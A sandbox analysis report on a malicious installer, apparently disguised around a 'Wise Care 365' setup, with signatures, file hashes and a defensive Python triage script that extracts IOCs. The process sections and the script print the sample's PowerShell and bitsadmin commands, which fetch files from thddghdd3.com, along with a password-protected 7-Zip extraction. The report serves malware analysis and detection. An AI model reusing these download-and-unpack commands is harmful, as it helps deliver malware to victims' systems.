Analysis Overview
SHA256
9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da
Threat Level: Known bad
The file LisectAVT_2403002A_312.exe was found to be: Known bad.
Malicious Activity Summary
Download via BitsAdmin
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-25 00:19
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-25 00:19
Reported
2024-07-25 00:21
Platform
win7-20240704-en
Max time kernel
147s
Max time network
122s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp | N/A |
| N/A | N/A | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe
"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"
C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp" /SL5="$400B2,38098121,731648,C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\main.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml
C:\ProgramData\ConsoleApp\7za.exe
7za.exe x -y -p1r7d2kvUf3 "*.7z"
C:\Windows\SysWOW64\timeout.exe
timeout /T 3 /NOBREAK
C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe
"C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe"
C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp
"C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$40164,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | thddghdd3.com | udp |
Files
memory/2132-2-0x0000000000401000-0x00000000004A9000-memory.dmp
memory/2132-0-0x0000000000400000-0x00000000004C0000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
| MD5 | f098bb35dca6ae44a05c65aac7a5444b |
| SHA1 | c5c50d740c1b8e9d8715fc3b2c8026156295a437 |
| SHA256 | 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe |
| SHA512 | 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b |
\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/2316-12-0x0000000000400000-0x000000000067B000-memory.dmp
C:\ProgramData\ConsoleApp\ControlSet000.bat
| MD5 | 484c8df5d5bd9d82f4ac1861472cf519 |
| SHA1 | eddc0d20c81d9dba14ee0be32c7c5f563481e792 |
| SHA256 | f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953 |
| SHA512 | 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7 |
C:\ProgramData\ConsoleApp\main.bat
| MD5 | 0ddc6dd98f86cff7e50c1621fd16b55a |
| SHA1 | 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a |
| SHA256 | b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6 |
| SHA512 | 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609 |
\ProgramData\ConsoleApp\7za.exe
| MD5 | c3d309156b8e8cf1d158de5fab1c2b40 |
| SHA1 | 58ad15d91abac2c6203e389ac8a8ff6685406d41 |
| SHA256 | 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c |
| SHA512 | 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498 |
memory/2132-57-0x0000000000400000-0x00000000004C0000-memory.dmp
memory/2316-58-0x0000000000400000-0x000000000067B000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe
| MD5 | 05fda662bb382c2c95b9318b2394b246 |
| SHA1 | 69365314afb6102209a806e0e474d94e58207ec6 |
| SHA256 | 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2 |
| SHA512 | b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312 |
memory/1988-66-0x0000000000400000-0x0000000000417000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp
| MD5 | 9d7850e858c24db77b91b25adf93812f |
| SHA1 | f0bb0a9074b38dad7492422247c0a316197d26b6 |
| SHA256 | c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8 |
| SHA512 | e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec |
\Users\Admin\AppData\Local\Temp\is-A3D0Q.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/1740-84-0x0000000000600000-0x0000000000616000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-A3D0Q.tmp\ISTask.dll
| MD5 | 86a1311d51c00b278cb7f27796ea442e |
| SHA1 | ac08ac9d08f8f5380e2a9a65f4117862aa861a19 |
| SHA256 | e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d |
| SHA512 | 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec |
\Users\Admin\AppData\Local\Temp\is-A3D0Q.tmp\VclStylesInno.dll
| MD5 | b0ca93ceb050a2feff0b19e65072bbb5 |
| SHA1 | 7ebbbbe2d2acd8fd516f824338d254a33b69f08d |
| SHA256 | 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246 |
| SHA512 | 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2 |
memory/1740-94-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-114-0x0000000007560000-0x0000000007561000-memory.dmp
memory/1740-145-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-144-0x0000000007600000-0x0000000007601000-memory.dmp
memory/1740-142-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-141-0x00000000075F0000-0x00000000075F1000-memory.dmp
memory/1740-140-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-139-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-138-0x00000000075E0000-0x00000000075E1000-memory.dmp
memory/1740-137-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-136-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-135-0x00000000075D0000-0x00000000075D1000-memory.dmp
memory/1740-134-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-132-0x00000000075C0000-0x00000000075C1000-memory.dmp
memory/1740-131-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-130-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-129-0x00000000075B0000-0x00000000075B1000-memory.dmp
memory/1740-128-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-127-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-126-0x00000000075A0000-0x00000000075A1000-memory.dmp
memory/1740-125-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-124-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-123-0x0000000007590000-0x0000000007591000-memory.dmp
memory/1740-122-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-121-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-120-0x0000000007580000-0x0000000007581000-memory.dmp
memory/1740-119-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-118-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-117-0x0000000007570000-0x0000000007571000-memory.dmp
memory/1740-116-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-115-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-113-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-112-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-111-0x0000000007550000-0x0000000007551000-memory.dmp
memory/1740-110-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-109-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-108-0x00000000024A0000-0x00000000024A1000-memory.dmp
memory/1740-107-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-106-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-105-0x0000000002490000-0x0000000002491000-memory.dmp
memory/1740-104-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-143-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-99-0x0000000002470000-0x0000000002471000-memory.dmp
memory/1740-98-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-97-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-133-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-96-0x0000000002460000-0x0000000002461000-memory.dmp
memory/1740-95-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-93-0x0000000002450000-0x0000000002451000-memory.dmp
memory/1740-92-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-91-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-103-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-102-0x0000000002480000-0x0000000002481000-memory.dmp
memory/1740-101-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-100-0x0000000007410000-0x0000000007550000-memory.dmp
memory/1740-90-0x0000000001F30000-0x0000000001F31000-memory.dmp
memory/1740-88-0x00000000070F0000-0x000000000740A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-25 00:19
Reported
2024-07-25 00:22
Platform
win10v2004-20240709-en
Max time kernel
150s
Max time network
128s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp | N/A |
| N/A | N/A | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe
"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"
C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp" /SL5="$80092,38098121,731648,C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml
C:\ProgramData\ConsoleApp\7za.exe
7za.exe x -y -p1r7d2kvUf3 "*.7z"
C:\Windows\SysWOW64\timeout.exe
timeout /T 3 /NOBREAK
C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe
"C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe"
C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$802D0,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe"
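The process lists of behavioral1 and behavioral2 are identical apart from the Inno Setup temp-directory names, and together they show the whole living-off-the-land chain the installer's batch files run: a PowerShell `WebClient.DownloadFile`, a `bitsadmin /transfer` job, a password-protected `7za.exe x -p...` extraction and a `timeout` delay. The triage helper below is an added example, not part of the sandbox output or of the sample; it takes those command lines (copied from the report into a constructed list), flags each stage, and pulls out the URLs, domain and archive password as IOCs. The rule names and the ATT&CK IDs for BITS (T1197), decode/unpack (T1140) and time-based delay (T1497.003) are this example's own mapping; the helper names are likewise assumptions.

```python
"""Command-line triage for the LOLBin download/unpack chain seen in this report.

Added example, not sandbox output. The predicates are plain string checks
so the logic is auditable; they are tuned to the command lines shown above.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample: the command lines listed under "Processes" in the report.
SAMPLE_PROCESSES = [
    r'"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"',
    r'cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "',
    r'cmd /c ""C:\ProgramData\ConsoleApp\main.bat" "',
    "powershell -Command \"(New-Object Net.WebClient).DownloadFile("
    "'http://thddghdd3.com/hfile.bin', 'hfile.bin')\"",
    r"bitsadmin /transfer Explorers /download /priority FOREGROUND "
    r"http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml",
    '7za.exe x -y -p1r7d2kvUf3 "*.7z"',
    "timeout /T 3 /NOBREAK",
]

URL_RE = re.compile(r"""https?://[^\s'"<>,)]+""", re.IGNORECASE)


@dataclass
class Finding:
    technique: str
    attack_id: str          # ATT&CK mapping chosen for this example
    cmdline: str
    urls: list = field(default_factory=list)
    details: dict = field(default_factory=dict)


def _image(cmd: str) -> str:
    """First token of the command line, unquoted and lower-cased."""
    return cmd.strip().split()[0].strip('"').lower()


# (technique name, ATT&CK id, predicate over the raw command line)
RULES = [
    ("Download via BitsAdmin", "T1197",
     lambda c: _image(c).endswith(("bitsadmin", "bitsadmin.exe"))
     and "/transfer" in c.lower()),
    ("PowerShell WebClient download", "T1059.001",
     lambda c: _image(c).endswith(("powershell", "powershell.exe"))
     and "downloadfile" in c.lower()),
    ("Password-protected 7-Zip extraction", "T1140",
     lambda c: re.search(r"\b7za?\.exe\s+x\b", c, re.I) is not None
     and re.search(r"\s-p\S", c) is not None),
    ("Execution delay via timeout.exe", "T1497.003",
     lambda c: _image(c).endswith(("timeout", "timeout.exe"))),
]


def triage(cmdlines):
    """Return one Finding per matched command line, in process order."""
    findings = []
    for cmd in cmdlines:
        for name, tid, pred in RULES:
            if not pred(cmd):
                continue
            f = Finding(name, tid, cmd, urls=URL_RE.findall(cmd))
            if tid == "T1197":
                # bitsadmin /transfer <job> ... <url> <local path>: last token is the drop path
                f.details["destination"] = cmd.split()[-1]
            elif tid == "T1140":
                m = re.search(r"\s-p(\S+)", cmd)
                if m:
                    f.details["password"] = m.group(1)   # exposed in process-creation logs
            elif tid == "T1497.003":
                m = re.search(r"/T\s+(\d+)", cmd, re.I)
                if m:
                    f.details["seconds"] = m.group(1)
            findings.append(f)
    return findings


def extract_iocs(findings):
    """Collapse findings into a deduplicated, sorted IOC set."""
    urls = sorted({u for f in findings for u in f.urls})
    domains = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    passwords = sorted({f.details["password"] for f in findings if "password" in f.details})
    return {"urls": urls, "domains": domains, "archive_passwords": passwords}


if __name__ == "__main__":
    results = triage(SAMPLE_PROCESSES)
    for r in results:
        print(f"[{r.attack_id}] {r.technique}: {r.details or r.urls}")
    print(extract_iocs(results))
```

Two points worth noting from the output. First, both downloads target the same host, `thddghdd3.com`, which matches the only non-reverse-DNS lookup in the Network tables; neither detonation shows a TCP connection to it, so the payload stages (`hfile.bin`, `Telemetry.xml`, the `*.7z` archives) were never observed and the report cannot say what they contain. Second, the 7-Zip password is passed on the command line, so any process-creation telemetry that captures arguments (Sysmon Event ID 1, or 4688 with command-line auditing) records it, which defeats the point of encrypting the archive against scanning.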
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thddghdd3.com | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
memory/3848-0-0x0000000000400000-0x00000000004C0000-memory.dmp
memory/3848-2-0x0000000000401000-0x00000000004A9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp
| MD5 | f098bb35dca6ae44a05c65aac7a5444b |
| SHA1 | c5c50d740c1b8e9d8715fc3b2c8026156295a437 |
| SHA256 | 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe |
| SHA512 | 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b |
